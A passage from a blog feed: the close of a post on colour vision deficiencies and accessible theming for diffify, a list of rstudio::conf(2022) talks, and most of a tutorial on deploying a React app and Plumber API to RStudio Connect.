&lt;h2 id="colour-vision-deficiencies-and-colour-blindness"&gt;Colour vision deficiencies and colour blindness&lt;/h2&gt;
&lt;p&gt;The terminology around colour vision deficiencies can be confusing.&lt;/p&gt;
&lt;p&gt;People with normal colour vision have three types of functioning colour-sensitive cells in their eyes and are said to be &amp;ldquo;trichromats&amp;rdquo; (from the Greek &amp;ldquo;tri&amp;rdquo; =&amp;gt; three and &amp;ldquo;chroma&amp;rdquo; =&amp;gt; colour). Those cells are called &amp;ldquo;cones&amp;rdquo; and have different wavelength peak sensitivities. These are sometimes referred to as &amp;ldquo;red&amp;rdquo;, &amp;ldquo;green&amp;rdquo; and &amp;ldquo;blue&amp;rdquo; cones, but more accurate terms are &amp;ldquo;long&amp;rdquo; (&amp;ldquo;L&amp;rdquo;), &amp;ldquo;medium&amp;rdquo; (&amp;ldquo;M&amp;rdquo;) and &amp;ldquo;short&amp;rdquo; (&amp;ldquo;S&amp;rdquo;) in reference to those wavelengths. The chart below (from the Wikipedia article on &lt;a href="https://en.wikipedia.org/wiki/Cone_cell" rel="external"&gt;cone cells&lt;/a&gt;) shows that the peak sensitivity of the L cone cells is actually in the yellow part of the visible spectrum, not the red.&lt;/p&gt;
&lt;img src="images/cones.svg" alt="A line graph showing the normalised responses of the three types of cone cell as a function of the wavelength of incident light. An underlay shows the visible spectrum itself, going from blue to red The peak sensitivity of the L cone is actually in the yellow part of the spectrum." /&gt;
&lt;p&gt;Some people only have two types of functional cones. Correspondingly they are called &amp;ldquo;dichromats&amp;rdquo;. People lacking functional L cones are &amp;ldquo;protanopes&amp;rdquo; while those lacking functional M cones are &amp;ldquo;deuteranopes&amp;rdquo; and those without functional S cones are &amp;ldquo;tritanopes&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Alongside true dichromacy there is also &amp;ldquo;anomalous trichromacy&amp;rdquo;. Anomalous trichromats have three functional types of cones, but one type does not function as expected. These three conditions are then referred to as &amp;ldquo;protoanomaly&amp;rdquo;, &amp;ldquo;deuteranomaly&amp;rdquo; and &amp;ldquo;tritanomaly&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Collectively, suffererers from these conditions are often said to be &amp;ldquo;colour blind&amp;rdquo;. However, all sufferers can see colour so this is something of a misnomer. Nevertheless, &amp;ldquo;protans&amp;rdquo; (those who suffer from protanopia or protoanomaly) and &amp;ldquo;deutans&amp;rdquo; (deuteranopia or deuteranomaly) are often said to have red-green colour blindness while &amp;ldquo;tritans&amp;rdquo; (tritanopia or tritanomaly) may be said to have blue-yellow colour blindness.&lt;/p&gt;
&lt;p&gt;Collectively, the groups that are said to exhibit red-green colour blindness are much larger than the groups said to exhibit blue-yellow colour blindness. But it&amp;rsquo;s important to stress that this &lt;em&gt;does not&lt;/em&gt; mean we simply avoid pairing two colours we semantically refer to as &amp;ldquo;red&amp;rdquo; and &amp;ldquo;green&amp;rdquo; together. It&amp;rsquo;s more complicated than that: Trichromats see colour in a three-dimensional space, dichromats see colour in a two-dimensional space and the names we give to colours occupy a somewhat fuzzy, somewhat discrete space.&lt;/p&gt;
&lt;p&gt;The image below shows a screenshot of the Functions section of &lt;a href="https://diffify.com/R/ggplot2/3.3.2/3.3.6" rel="external"&gt;diffify&lt;/a&gt; for the {ggplot2} package using the default theme that most users will see when they visit the site for the first time. Overlaid on the bottom-left half of the image is a simulation (we used &lt;a href="https://michelf.ca/projects/sim-daltonism/" rel="external"&gt;Sim Daltonism&lt;/a&gt;, more on that in Part 2) of how the screenshot would appear to a user with deuteranopia.&lt;/p&gt;
&lt;img src="images/default-deut.png" srcset="images/default-deut@2x.png 2x" alt="A screenshot of a section from diffify using the default theme. The top-right half of the image assumes normal vision. The bottom-left half of the image applies a deuternopia filter using the Sim Daltonism software." /&gt;
&lt;p&gt;The simulation suggests that deuteranopes might struggle to see the difference between the colours used for &amp;ldquo;Added&amp;rdquo; and &amp;ldquo;Removed&amp;rdquo; buttons and entries. There is additional encoding with the plus and minus symbols, but we wanted to offer something better.&lt;/p&gt;
&lt;p&gt;Other, more extreme, colour vision deficiencies exist including several forms of &amp;ldquo;monochromacy&amp;rdquo;. &amp;ldquo;Monochromats&amp;rdquo; can only distinguish colours through their brightness. These conditions (where the term &amp;ldquo;colour blind&amp;rdquo; is, perhaps, more appropriate) are very rare and so won&amp;rsquo;t be covered further here.&lt;/p&gt;
&lt;h2 id="coming-up"&gt;Coming Up&lt;/h2&gt;
&lt;p&gt;In Part 2 I&amp;rsquo;ll cover what theming is, how we used it to improve &lt;a href="https://diffify.com/" rel="external"&gt;diffify&lt;/a&gt; and the tools we used to help us test our improvements.&lt;/p&gt;
&lt;p&gt;Of course we aren&amp;rsquo;t claiming we&amp;rsquo;ve got everything right. If you think there&amp;rsquo;s anything we missed or just got wrong, please do let us know by raising an issue in the &lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;diffify github repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>RStudio2022: Talks to watch out for</title><link>https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/</link><pubDate>Tue, 26 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf(2022)&lt;/a&gt; is well underway and, after two days of workshops, the main talks begin tomorrow. Here are our highlights of talks we&amp;rsquo;re most excited about!&lt;/p&gt;
&lt;h3 id="the-past-and-future-of-shiny"&gt;The Past and Future of Shiny&lt;/h3&gt;
&lt;p&gt;If you are interested in Shiny, then this &lt;a href="https://rstudioconf2022.sched.com/event/11iZl/the-past-and-future-of-shiny" rel="external"&gt;keynote&lt;/a&gt; by Joe Cheng will be top of your list. As he says in his abstract, it&amp;rsquo;s hard to believe that Shiny was released ten years ago.&lt;/p&gt;
&lt;p&gt;Why attend: Shiny is key to a lot of what we do at &lt;a href="https://jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;. We build, maintain and deploy apps weekly, if not daily!&lt;/p&gt;
&lt;h3 id="packages-and-process"&gt;Packages and Process&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iYK/packages-and-process" rel="external"&gt;Ellis Hughes&lt;/a&gt; is talking about how his team use R packages to help streamline processes at
GSK. Since he works in a validated environment, he has particular challenges to overcome.&lt;/p&gt;
&lt;p&gt;Why attend: I think we&amp;rsquo;re pretty slick with packages at Jumping Rivers. However,
there is always something to improve.&lt;/p&gt;
&lt;h3 id="dbcooper-turn-any-database-into-an-r-or-python-package"&gt;dbcooper: Turn any database into an R or Python package&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iZi/dbcooper-turn-any-database-into-an-r-or-python-package" rel="external"&gt;David Robinson&lt;/a&gt; is going to discuss the {dbcooper} package, which turns a database connection into a collection of accessor functions, letting users take advantage of autocomplete as they browse a database in the same ways they would engage with local tables.&lt;/p&gt;
&lt;p&gt;Why attend: I understand the concept, but would like to understand how the package would be used in anger. Also, David is an excellent speaker!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-rstudio2022-talks-watch-list"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="these-are-a-few-of-my-favorite-things-about-quarto-presentations"&gt;These are a few of my favorite things (about Quarto presentations)&lt;/h3&gt;
&lt;p&gt;In this talk, &lt;a href="https://rstudioconf2022.sched.com/event/11ibN/these-are-a-few-of-my-favorite-things-about-quarto-presentations" rel="external"&gt;Tracy Teal&lt;/a&gt; will discuss some of the best things about making interactive HTML presentations with Quarto.&lt;/p&gt;
&lt;p&gt;Why attend: I&amp;rsquo;ve been using RMarkdown for presentations for a while and recently switched to Quarto, so I&amp;rsquo;m curious to explore the features I haven&amp;rsquo;t found yet.&lt;/p&gt;
&lt;h3 id="r-python-and-tableau-a-love-triangle"&gt;R, Python, and Tableau: A Love Triangle&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iYQ/r-python-and-tableau-a-love-triangle" rel="external"&gt;James Blair&lt;/a&gt; will discuss how users can gain more advanced analytic capabilities in their Tableau dashboards by also using R and Python.&lt;/p&gt;
&lt;p&gt;Why attend: At Jumping Rivers we&amp;rsquo;re already a bilingual company who use both R and Python, and we&amp;rsquo;ve recently started using Tableau as well. I&amp;rsquo;m excited to see how all three work together at once!&lt;/p&gt;
&lt;h3 id="what-they-forgot-to-teach-you-about-becoming-an-open-source-contributor"&gt;What they forgot to teach you about becoming an open source contributor&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iZf/what-they-forgot-to-teach-you-about-becoming-an-open-source-contributor" rel="external"&gt;Nic Crane&lt;/a&gt; will be talking about their journey from occasional open source contributor to full time project maintainer, and answering some of the unknowns about contributing to open source projects.&lt;/p&gt;
&lt;p&gt;Why attend: Open source projects are one of the best parts of the R community, and something we&amp;rsquo;re passionate about at Jumping Rivers.&lt;/p&gt;
&lt;h2 id="jumping-rivers-talks--events"&gt;Jumping Rivers Talks / Events&lt;/h2&gt;
&lt;h3 id="comparing-package-versions-with-diffify"&gt;Comparing package versions with Diffify&lt;/h3&gt;
&lt;p&gt;Colin will be talking about &lt;a href="https://rstudioconf2022.sched.com/event/11ia3/comparing-package-versions-with-diffify" rel="external"&gt;diffify.com&lt;/a&gt; in a lighting talk. diffify is a tool that allows you to easily compare package versions.&lt;/p&gt;
&lt;h3 id="say-hello-to-multilingual-shiny-apps"&gt;Say Hello! to Multilingual Shiny Apps&lt;/h3&gt;
&lt;p&gt;Nicola will be discussing how we built a &lt;a href="https://rstudioconf2022.sched.com/event/11iaI/say-hello-to-multilingual-shiny-apps" rel="external"&gt;multilingual Shiny app&lt;/a&gt;, why it&amp;rsquo;s important, and why it&amp;rsquo;s not so simple in a lightning talk.&lt;/p&gt;
&lt;h3 id="birds-of-a-feather-government-public-sector"&gt;Birds of a Feather: Government Public Sector&lt;/h3&gt;
&lt;p&gt;If you work in Government or the Public sector, make sure you attend the lunchtime &lt;a href="https://rstudioconf2022.sched.com/event/137lR/birds-of-a-feather-lunch-several-groups" rel="external"&gt;Birds of a Feather&lt;/a&gt;. BoF allows you to meet people from the same industry to discuss your challenges and successes!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating the Shiny App tutorial with a Plumber API + React: Part 3</title><link>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/</link><pubDate>Thu, 21 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Recreating the Shiny App tutorial with a Plumber API + React: Part 3 (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So far, we have seen how to create an app using ReactJS and and a Plumber API. In part 3, we will show you how to host the application on RStudio Connect (RSC)!&lt;/p&gt;
&lt;p&gt;When it comes to hosting the application on RSC we will set the content URL for both the app and API so that they are in the same domain and won&amp;rsquo;t have this CORS issue.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{YOUR_CONNECT_SERVER_HERE}/stf/api/
https://{YOUR_CONNECT_SERVER_HERE}/stf/app/
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Both apps will be a subdomain of&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{YOUR_CONNECT_SERVER_HERE}/stf/
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="preparing-the-build-for-rstudio-connect"&gt;Preparing the Build for RStudio Connect&lt;/h3&gt;
&lt;p&gt;To prepare the build for RStudio Connect we can do a couple of things we need to add to make it deployable.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;public/&lt;/code&gt; folder in React is great for storing static assets such as images, fonts, and JS files. It is located within the &lt;code&gt;app/&lt;/code&gt; directory. Any files placed in this folder will be copied into the build folder when you run the build script. This is useful if you need to reference a file in your code that is not JavaScript, such as an image. For example, if you have an image named &lt;code&gt;logo.png&lt;/code&gt; in your public folder, you would reference it in your code like this: &lt;code&gt;/logo.png&lt;/code&gt;. It&amp;rsquo;s important to note that the &lt;code&gt;public&lt;/code&gt; folder is only for static assets.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-plumber-react-part-3"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The public folder contains the HTML which can be changed to set things like the page title. The &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag with the compiled code will be added to it automatically during the build process. In index.html you might notice that there are links to various files from the public folder.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; crossOrigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;use-credentials&amp;#34;&lt;/span&gt;/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;apple-touch-icon&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/logo192.png&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the above code the &lt;code&gt;%PUBLIC_URL%&lt;/code&gt; is a variable that contains the URL to the public folder of the application. Missing files will not be called at compilation time, and will cause 404 errors at runtime. If this &lt;code&gt;%PUBLIC_URL%&lt;/code&gt; variable is incorrect then we will receive 404 errors when accessing the deployed build.&lt;/p&gt;
&lt;p&gt;The next minor issue is that we are using a hardcoded URL for our API. When developing locally we probably want to use the locally hosted URL e.g &lt;code&gt;localhost:8000&lt;/code&gt;. When we deploy both the API and app to RSC, we want to change this to be the URL of our production API which we will know once we&amp;rsquo;ve deployed it to RSC.&lt;/p&gt;
&lt;p&gt;We can extract these values out into environment variables that can change between development and production environments. We do this by creating two files &lt;code&gt;.env.production&lt;/code&gt; and &lt;code&gt;.env.development&lt;/code&gt; in the root directory of the app.&lt;/p&gt;
&lt;p&gt;Within the &lt;code&gt;.env.development&lt;/code&gt; we can add&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;PUBLIC_URL=localhost:3000
REACT_APP_PUBLIC_API_URL=localhost:8000
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Within &lt;code&gt;.env.production&lt;/code&gt; we need to add the URL of the RStudio Connect platform that we are deploying to. In RSC you can also set content URL for your content. We&amp;rsquo;re going to set these variables to be the content urls we will set later when deploying to RSC&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;PUBLIC_URL=https://{YOUR_CONNECT_SERVER_HERE}/stf/api/
REACT_APP_PUBLIC_API_URL=https://{YOUR_CONNECT_SERVER_HERE}/stf/react/
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Within the &lt;code&gt;App.js&lt;/code&gt; file we need to change the &lt;code&gt;onSliderChange()&lt;/code&gt; function to use this newly defined &lt;code&gt;REACT_APP_PUBLIC_API_URL&lt;/code&gt; envrionment variable&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; onSliderChange(input) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; apiURL &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; process.env.REACT_APP_PUBLIC_API_URL;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; axios.get(&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;apiURL&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; input,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }).then((data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.setState({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rawdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bar&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="building-the-application"&gt;Building the Application&lt;/h3&gt;
&lt;p&gt;From our application folder we want to run the following to create a production build for our React Application&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run-script build
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The build process in React is responsible for converting the source code into a form that can be executed by the browser. This process includes several steps, such as transpiling, bundling, and optimization.&lt;/p&gt;
&lt;p&gt;During transpilation, the source code is converted from one format to another. For example, it can be converted from JSX to JavaScript. This step is necessary because browsers cannot understand JSX directly.&lt;/p&gt;
&lt;p&gt;After transpilation, the code is bundled into static minified files. Bundling helps to reduce the size of the code and make it more efficient to load.&lt;/p&gt;
&lt;p&gt;Finally, the code is optimized for performance. This may include minification, which reduces the size of the code, and dead code elimination, which removes unused code from the bundle. By optimizing the code, the build aims to run quickly and efficiently in the browser.&lt;/p&gt;
&lt;h3 id="the-manifest-file"&gt;The Manifest File&lt;/h3&gt;
&lt;p&gt;To deploy content to RStudio Connect a manifest.json file is required. A manifest file for RStudio Connect is a list of the files that need to be deployed in order for content to run. This list includes both the source code files and any dependencies that are required. The manifest file ensures that all of the necessary files are included in the deployment, and it also provides a way to specify the order in which the files should be deployed. This is important because some files may need to be deployed before others in order for everything to work correctly. The manifest file is typically named &lt;code&gt;manifest.json&lt;/code&gt; and it is placed in the same directory as the rest of the files that need to be deployed.&lt;/p&gt;
&lt;p&gt;We can create a manifest file with the {rsconnect} R package.&lt;/p&gt;
&lt;h3 id="the-rsconnect-r-package"&gt;The rsconnect R package&lt;/h3&gt;
&lt;p&gt;The {rsconnect} R package makes it easy to deploy R code and other applications such as our React app to RStudio Connect. You can get your code up and running on RSC with minimal configuration in just a few simple steps. All you need is an RSC server and an account with privileges to deploy content.&lt;/p&gt;
&lt;p&gt;If we haven&amp;rsquo;t installed the package we can install it with &lt;code&gt;install.packages(&amp;quot;rsconnect&amp;quot;)&lt;/code&gt; from within an R session.&lt;/p&gt;
&lt;p&gt;You will then need to register your RStudio Connect user to the package by specifying your account name and server URL&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rsconnect&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;addConnectServer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://myserveraddress:3939&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;myserver&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;connectUser&lt;/span&gt;(server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;myserver&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The {rsconnect} server name, &lt;code&gt;myserver&lt;/code&gt;, is an arbitrary name that is used to identify an RSC server when using {rsconnect}. You can choose any name you wish.&lt;/p&gt;
&lt;p&gt;The output of this command will prompt you with a link to your RSC server asking you to authenticate.&lt;/p&gt;
&lt;p&gt;We need to create manifest files for both the app build directory and the API directory. We can do this via &lt;code&gt;rsconnect::writeManifest(appDir = 'path/to/app/build/')&lt;/code&gt; you can specify the path to the directory with the &lt;code&gt;appDir&lt;/code&gt; argument. The default value for the &lt;code&gt;appDir&lt;/code&gt; argument is the current working directory, so if you start the R session in a directory we need to write a manifest for, then there is no need to specify any arguments, e.g &lt;code&gt;rsconnect::writeManifest()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Once both manifests are created we can use the following functions to deploy the app and API&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rsconnect&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;deployApp&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appDir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;path/to/api/directory&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Static Faithful API&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;myserver&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;deployApp&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appDir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;path/to/app/directory&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Static Faithful App&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;myserver&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output of this function will prompt links to your deployed content. From there you can set the content URL.&lt;/p&gt;
&lt;h3 id="content-url"&gt;Content URL&lt;/h3&gt;
&lt;p&gt;The final step to avoid CORS problems is to set both the app&amp;rsquo;s and API&amp;rsquo;s content URL. This may be accomplished by opening the settings symbol, then clicking the Access tab. There will be a Content URL entry at the bottom of the sidebar.&lt;/p&gt;
&lt;p&gt;We want to set these to be the same as the URLs we chose for the environment variables in &lt;code&gt;.env.production&lt;/code&gt;, if you&amp;rsquo;ve been following the tutorial these would be as follows&lt;/p&gt;
